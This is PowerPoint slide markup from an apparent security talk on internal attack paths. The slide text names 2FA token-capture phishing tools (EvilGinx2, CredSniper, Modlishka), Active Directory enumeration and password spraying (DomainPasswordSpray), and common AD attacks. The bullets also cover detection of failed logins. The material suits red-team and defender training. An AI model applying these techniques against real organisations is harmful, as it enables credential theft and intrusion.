      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41050A6-CF93-734A-B8EC-C1AF3E022E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="1825625"/>
            <a:ext cx="8775356" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visibility into unsuccessful login attempts on login portals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ability to correlate activity and identify attempts vs success</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Familiarity with tools that can capture 2FA tokens (ex: EvilGinx2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CredSniper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modlishka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CE1E834-2D7D-AD45-857C-2DE9CB5B6B21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8507798" y="2193494"/>
            <a:ext cx="3489244" cy="2613283"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D0D3105-038A-124F-B421-A4981369EDD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777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3159-544C-3D48-8911-04589ED6F750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1462217" y="2073833"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internal Attack Paths &amp; Considerations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39F9D7D1-3795-6B49-9872-89E6485C9E5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50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10944"/>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F5C5-E6B6-CE42-B23B-4C583363B1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>About Me</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41050A6-CF93-734A-B8EC-C1AF3E022E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295093" y="1775426"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Offensive Security Engineer @ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SIRT -&gt; Vuln Mgt -&gt; Red Team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Personal interest in macOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enjoy 80s/90s Nostalgia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      @cedowens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DB0E1FB-929A-5544-8597-443C2289EC39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7482286" y="3106073"/>
            <a:ext cx="2218877" cy="3188043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FF78785-D2BF-2A42-8D5B-E36BC95BFA0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9619317" y="749235"/>
            <a:ext cx="2052954" cy="2852525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E07B48E5-19FE-A640-A261-C84DC036A42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FF859A7-AA26-9A4B-AEAA-62836637731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0406" y="4514743"/>
            <a:ext cx="1023124" cy="1023124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="Twilio - Communication APIs for SMS, Voice, Video and Authentication">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1CA4524-0442-904F-960D-F0A608299BE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611763" y="1775426"/>
            <a:ext cx="1475774" cy="677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799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F5C5-E6B6-CE42-B23B-4C583363B1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internal Recon/Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41050A6-CF93-734A-B8EC-C1AF3E022E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1442565"/>
            <a:ext cx="8454080" cy="4871737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From AD joined host:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AD Enum (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>machound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, AD dumps)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AD Password Spray (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>DomainPasswordSpray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dafthack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port scans </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internal wiki/Jira/Confluence/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sharepoint</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internal git</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0103264-D2E9-EA45-AD1C-AA43B6E6B456}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10115550" y="4568637"/>
            <a:ext cx="1749286" cy="1179336"/>
            <a:chOff x="7341704" y="1510854"/>
            <a:chExt cx="1749286" cy="1179336"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B13434D-ABDB-6E4E-B653-659D664CD959}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7447722" y="1510854"/>
              <a:ext cx="1524000" cy="821529"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>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apezoid 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{570CD4FD-E1E6-D24D-935B-73742CA062C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7341704" y="2332383"/>
              <a:ext cx="1749286" cy="357807"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">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Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1511EC21-AC3A-3144-82E8-91B7976873E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="10666907" y="2763338"/>
            <a:ext cx="424674" cy="1776414"/>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C558CCB-A37E-2743-BF87-EACEFC658F67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="11114035" y="2779974"/>
            <a:ext cx="401824" cy="1743142"/>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B1A5332-9F6A-E248-8A6D-BB7EAE234322}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="11158943" y="3064476"/>
            <a:ext cx="888895" cy="1458641"/>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83E339D-DCF5-784B-9953-A4D8E843AF7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9990766" y="2873269"/>
            <a:ext cx="1060264" cy="1556552"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3EBBED6-2C18-4E4D-A89C-E95089DE042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54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DD8B-B9D0-F64C-A266-FD538C4944A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1450392" y="304927"/>
            <a:ext cx="9291215" cy="1049235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Common AD Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFE960C0-89E8-9D4C-9A46-D0C85372DFE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6460744" y="1811900"/>
            <a:ext cx="1638300" cy="1231900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19" descr="A picture containing room, drawing&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C46DBF-EB73-FB45-8FB5-3583AFBC6D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0062" y="1584740"/>
            <a:ext cx="2956659" cy="2036153"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{010ACFF8-6297-CA48-9BAB-61D081ED4C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223136" y="1404686"/>
            <a:ext cx="5639822" cy="2042111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EF40ED">
              <a:alpha val="0"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="EF40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E15A7DF7-0D0D-244F-AF07-6817DC620974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481405" y="1458738"/>
            <a:ext cx="3308092" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find Misconfigured Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77FE6574-9A62-444E-97CA-808B2C1FEC9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40072" y="2072043"/>
            <a:ext cx="1955687" cy="1061547"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA9D1EA-40E1-C84B-9A32-92E84F3BDEA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3814304" y="1643404"/>
            <a:ext cx="1745889" cy="1745889"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C139F149-4244-6546-BA8C-13AFE7EC89DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6111898" y="1412812"/>
            <a:ext cx="5639822" cy="2042111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="0"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="4EE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95B8F417-E322-4F4D-BB2D-D9135A3FCA3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7155854" y="1458738"/>
            <a:ext cx="3308092" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32977F75-DD86-6443-81CE-7C2340901B60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8121392" y="2110701"/>
            <a:ext cx="3432176" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Also a python collectors from fox-it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05DB18A8-B7C0-1A48-B3CA-7A5FFEAE7BED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
